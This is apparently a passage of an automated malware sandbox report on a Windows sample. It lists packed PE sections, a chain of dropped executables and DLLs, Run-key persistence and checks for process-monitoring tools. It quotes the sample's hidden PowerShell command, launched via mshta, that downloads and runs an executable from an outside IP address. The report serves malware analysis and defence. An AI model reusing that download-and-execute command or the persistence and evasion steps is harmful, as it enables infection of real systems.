                                    Source: random[4].exe.18.drStatic PE information: section name: rpnbigxq
                                    Source: random[4].exe.18.drStatic PE information: section name: yuihiqdq
                                    Source: random[4].exe.18.drStatic PE information: section name: .taggant
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name:
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: .idata
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: kzgpmlwq
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: pvwipuxs
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe0.18.drStatic PE information: section name:
                                    Source: random[4].exe0.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe0.18.drStatic PE information: section name: kzgpmlwq
                                    Source: random[4].exe0.18.drStatic PE information: section name: pvwipuxs
                                    Source: random[4].exe0.18.drStatic PE information: section name: .taggant
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: habslsfa
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: xrpgpkiv
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name: habslsfa
                                    Source: random[4].exe1.18.drStatic PE information: section name: xrpgpkiv
                                    Source: random[4].exe1.18.drStatic PE information: section name: .taggant
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name: .idata
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name: rpnbigxq
                                    Source: e18644e148.exe.18.drStatic PE information: section name: yuihiqdq
                                    Source: e18644e148.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name: yxdjfvbh
                                    Source: random[3].exe2.18.drStatic PE information: section name: qblkshbo
                                    Source: random[3].exe2.18.drStatic PE information: section name: .taggant
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: .idata
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: yxdjfvbh
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: qblkshbo
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: .taggant
                                    Source: random[2].exe0.18.drStatic PE information: section name: .code
                                    Source: f3d6f9fcfe.exe.18.drStatic PE information: section name: .code
                                    Source: random[2].exe1.18.drStatic PE information: section name: .fptable
                                    Source: 696689ce6d.exe.18.drStatic PE information: section name: .fptable
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: .idata
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: ykgekexw
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: prmmqeqz
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: .taggant
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E8D91C push ecx; ret 5_2_00E8D92F
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeCode function: 5_2_00E81359 push es; ret 5_2_00E8135A
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00F6D91C push ecx; ret 6_2_00F6D92F
                                    Source: EdYEXasNiR.exeStatic PE information: section name: entropy: 7.9828338445910125
                                    Source: EdYEXasNiR.exeStatic PE information: section name: ulqubmxb entropy: 7.955389523438137
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: random[1].exe.3.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: skotes.exe.5.drStatic PE information: section name: entropy: 7.081780025597735
                                    Source: random[3].exe.18.drStatic PE information: section name: entropy: 7.971055294478886
                                    Source: random[3].exe.18.drStatic PE information: section name: sxcdrnzu entropy: 7.953189916580493
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: entropy: 7.971055294478886
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: sxcdrnzu entropy: 7.953189916580493
                                    Source: random[4].exe.18.drStatic PE information: section name: rpnbigxq entropy: 7.949233459826734
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: habslsfa entropy: 7.95460581651071
                                    Source: random[4].exe1.18.drStatic PE information: section name: habslsfa entropy: 7.95460581651071
                                    Source: e18644e148.exe.18.drStatic PE information: section name: rpnbigxq entropy: 7.949233459826734
                                    Source: random[3].exe2.18.drStatic PE information: section name: entropy: 7.988197152861534
                                    Source: random[3].exe2.18.drStatic PE information: section name: yxdjfvbh entropy: 7.953581834436191
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: entropy: 7.988197152861534
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: yxdjfvbh entropy: 7.953581834436191
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.997518573935155
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.831462667091339
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.983042351633134
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: entropy: 7.881268733146465
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name: .data entropy: 7.981738077290403
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: entropy: 7.081780025597735

                                    Persistence and Installation Behavior

                                    barindex
                                    Drops PE files to the document folder of the user
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\Documents\HJEHIJEBKE.exeJump to dropped file
                                    Found pyInstaller with non standard icon
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeProcess created: "C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe"
                                    Tries to download and execute files (via powershell)
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\msvcp140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027574001\eO7MwvK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_ssl.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027575001\e18644e148.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcr90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027568001\8663788bd2.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32event.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\mozglue[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\select.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\msvcp140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027570001\85c59433f4.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32process.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\vcruntime140[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780Jump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\nss3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027577001\ad25d67005.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90u.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027567001\95ba65f98f.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_tkinter.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\Documents\HJEHIJEBKE.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\softokn3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[5].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\unicodedata.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeFile created: C:\wOXcVegx\jyidkjkfhjawd.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32trace.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027569001\f2a96255ac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\tk85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcm90.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\bz2.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\eIgpINK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027563001\64252d274d.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\random[4].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\eO7MwvK[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[3].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32api.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exeFile created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ucrtbase.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\msvcp90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\win32ui.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027576001\0bf9323d7e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pydJump to dropped file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\pywintypes27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\freebl3[1].dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027571001\ccb71f0bac.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027578001\4c4716526e.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027573001\eIgpINK.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\_win32sysloader.pydJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\python27.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\DQNVS06W\random[2].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\tcl85.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\pythoncom27.dllJump to dropped file
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeFile created: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B8DE7T9Q\random[1].exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI75642\mpc\41678903251236549780Jump to dropped file

                                    Boot Survival

                                    barindex
                                    Creates multiple autostart registry keys
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f2a96255ac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 85c59433f4.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ccb71f0bac.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8663788bd2.exe
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f3d6f9fcfe.exe
                                    Monitors registry run keys for changes
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunJump to behavior
                                    Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\Desktop\EdYEXasNiR.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: FilemonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeWindow searched: window name: RegmonclassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
